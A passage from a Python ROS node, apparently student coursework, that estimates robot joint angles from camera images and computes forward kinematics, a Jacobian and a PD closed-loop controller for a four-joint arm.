jacobian = (jacobian.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
finalMatrix = (finalMatrix.subs([(d0 ,ds[0]), (d1 ,ds[1]),(d2 ,ds[2]),(d3 ,ds[3])]))
finalMatrix = (finalMatrix.subs([(alpha0 ,alphas[0]), (alpha1, alphas[1]),(alpha2 ,alphas[2]),(alpha3 ,alphas[3])]))
finalMatrix = (finalMatrix.subs([(r0 ,rs[0]), (r1 ,rs[1]),(r2 ,rs[2]),(r3 ,rs[3])]))
return finalMatrix,jacobian, [theta0, theta1, theta2, theta3]
def sub_thetas(self,matrix, thetas):
matrix = (matrix.subs([(self.symThetas[0] ,thetas[0]), (self.symThetas[1] ,thetas[1]),(self.symThetas[2] ,thetas[2]),(self.symThetas[3] ,thetas[3])]))
return matrix
def sub_mat_jacobian(self, matrix):
jacobian = (matrix.col(3).jacobian(Matrix([self.symThetas[0], self.symThetas[1], self.symThetas[2], self.symThetas[3]])))
return jacobian
def forward_kinematics(self, ds, thetas, alphas, rs):
final_matrix = np.eye(4,4)
matrix0 = dh_matrix(ds[0],thetas[0], alphas[0], rs[0])
matrix1 = dh_matrix(ds[1],thetas[1], alphas[1], rs[1])
matrix2 = dh_matrix(ds[2],thetas[2], alphas[2], rs[2])
matrix3 = dh_matrix(ds[3],thetas[3], alphas[3], rs[3])
return ((matrix0.dot(matrix1)).dot(matrix2)).dot(matrix3)
def end_effector_estimate(self, jas):
thetas= np.deg2rad([-90,90,180,0]) +jas
numMatrix = self.sub_thetas((Matrix(self.fkmatrix)), thetas)
jac = self.sub_thetas((Matrix(self.fkjacobian)), thetas)
#numMatrix, jacobian = (self.sym_forward_kinametics(ds,thetas, alphas,rs))
ee_pos = (np.array(numMatrix).astype(np.float64))[:,3][:3]
return ee_pos, numMatrix, jac
def control_closed(self,jas, img1, img2):
ds = [2.5, 0, 0,0]
thetas= np.deg2rad([-90,90,180,0]) + jas
rs = [0,0,3.5,3]
alphas = np.deg2rad([-90,-90,-90,0])
# P gain
K_p = np.array([[1.6,0,0],[0,1.6,0], [0,0,1.6]])
# D gain
K_d = np.array([[0.4,0,0],[0,0.4,0],[0,0,0.4]])
# estimate time step
cur_time = np.array([rospy.get_time()])
dt = cur_time - self.time_previous_step
self.time_previous_step = cur_time
# robot end-effector position
pos, numMatrix, jacobian = self.end_effector_estimate(jas)
newOrig = self.detect3dyellow(self.cv_image1, self.cv_image2)
pos = np.array([pos[0], pos[1], -pos[2]])
pos = pos + newOrig
# THIS NEEDS TO BE SPHERE POSITION
pos_d= self.detect3dtarget(img1, img2) #np.array([self.targetXpos,self.targetYpos, self.targetZpos]) #
self.ee_pos_x.publish(pos[0])
self.ee_pos_y.publish(pos[1])
self.ee_pos_z.publish(pos[2])
error = pos_d - pos
error = np.array([error[0], error[1], -error[2]])
# estimate derivative of error
self.error_d = ((error) - self.error)/dt
# estimate error
self.error = error
#print(self.error)
q = jas
#print(jacobian)
jacobian = np.round(np.array(jacobian).astype(np.float64),6)[0:3,:]
jacobian[:,0] = np.array([0,0,0])
#print(jacobian)
J_inv = np.zeros((4,4))
#sympy.pprint(np.round(np.array(jacobian).astype(np.float64).reshape((3,4)), 6))
try:
J_inv = np.round(np.linalg.pinv(jacobian),6)# calculating the MP psudeo inverse of Jacobian
except np.linalg.LinAlgError as e:
J_inv = np.random.rand(4,3)
#print(J_inv)
dq_d =np.dot(J_inv, ( np.dot(K_d,self.error_d.transpose()) + np.dot(K_p,self.error.transpose()) ) ) # control input (angular velocity of joints)
for i in range(len(dq_d)):
if dq_d[i] > 1:
dq_d[i] = 1
if dq_d[i] < -1:
dq_d[i] = -1
q_d = q + (dt * dq_d) # control input (angular position of joints)
#print(q_d)
return q_d
def jointscallback(self, data1, data2, data3):
self.actualJoints = np.array([0, data1.data, data2.data, data3.data])
def callback(self, data1, data2):
try:
self.cv_image1 = self.bridge.imgmsg_to_cv2(data1, "bgr8")
self.cv_image2 = self.bridge.imgmsg_to_cv2(data2, "bgr8")
except CvBridgeError as e:
print(e)
if (self.fkmatrix == Matrix([0])):
self.fkmatrix,self.fkjacobian, self.symThetas = self.make_matrix()
jointsData = np.array([0,0,0,0])
q_d = np.array([0,0,0,0])
self.joints = Float64MultiArray()
q_d = self.control_closed(self.actualJoints,self.cv_image1, self.cv_image2)
jas = self.jointangles(self.cv_image1, self.cv_image2)
#self.oldq = q_d
#jas = [-1,0.1,0.7,1.5]
#self.oldq = q_d
#ds = [2.5, 0, 0,0]
#thetas= np.deg2rad([-90,90,180,0]) + jas
#rs = [0,0,3.5,3]
#alphas = np.deg2rad([-90,-90,-90,0])
#ee_pos, numMatrix, jacobian = self.end_effector_estimate(jas)
#newOrig = self.detect3dyellow(self.cv_image1, self.cv_image1)
#ee_pos = [ee_pos[0], ee_pos[1], -ee_pos[2]]
#ee_pos = newOrig + ee_pos
try:
self.robot_joint2_estimated_pub.publish(jas[1])
self.robot_joint3_estimated_pub.publish(jas[2])
self.robot_joint4_estimated_pub.publish(jas[3])
#self.robot_joint1_pub.publish(0)
#self.robot_joint2_pub.publish(q_d[1])
#self.robot_joint3_pub.publish(q_d[2])
#self.robot_joint4_pub.publish(q_d[3])
except CvBridgeError as e:
print(e)
#print(ee_pos)
#target = self.detect3dtarget(self.cv_image1,self.cv_image2)
#target = [target[0], target[1], -target[2]]
#print(target)
#red = self.detect3dred(self.cv_image1, self.cv_image2)
#print(newOrig)
#print(red)
#print(np.linalg.norm(red - ee_pos))
#print(target - ee_pos)
# call the class
def main(args):
angles = angle_estimator()
try:
rospy.spin()
except KeyboardInterrupt:
print("Shutting down")
# run the code if the node is called
if __name__ == '__main__':
main(sys.argv)
| TheCopperMind/IVR_CW1 | src/joint_state_estimation.py | joint_state_estimation.py | py | 15,311 | python | en | code | 1 | github-code | 90 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.